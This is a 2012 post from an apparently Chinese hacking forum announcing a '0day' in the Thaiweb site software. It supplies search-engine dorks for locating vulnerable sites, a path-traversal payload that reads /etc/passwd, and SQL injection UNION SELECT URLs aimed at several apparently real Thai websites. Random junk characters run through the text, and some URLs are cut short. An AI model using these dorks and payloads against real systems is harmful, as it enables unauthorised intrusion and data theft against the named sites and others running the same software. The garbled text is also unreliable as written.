找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2177|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:' I. ], m2 w8 P$ l- h# P% O

7 V' I4 z, J/ |- D4 ^( l# Gintext:powered by Thaiweb
: i& I2 Z+ o# @  n* S0 B9 o
: v3 U! b7 q4 b& r: S! A' Ainurl:index.php?page=board.php/ S2 ]; y- k% Q0 k

) D/ o  W; C1 k& D" C4 ^& ?" e, d
$ L. A8 f$ w7 S  k5 V* ?7 N; X( X) b' ^. Q0 U, X) s
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd; _" B+ H' w3 g- D- \/ ]
8 L& G! \4 e6 W3 G, H
9 b$ [# @' P" c( e1 |

! T8 \, P; H5 g9 h0 ~利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'! G  T3 U4 U3 R
1 x! L  w" e% m/ j4 m

' d, O  ?  P7 Z' x! J8 I( C0 S3 x2 n1 E0 ~: X
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
: [2 E9 ~4 ]  G
! {/ o, `$ o* m; |http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
9 C- e% [6 y" Z  D# W) ^ 9 K* o& L# Y" v6 @+ a5 p8 X4 ~4 h
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
' L4 ?4 x" g6 c1 W8 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表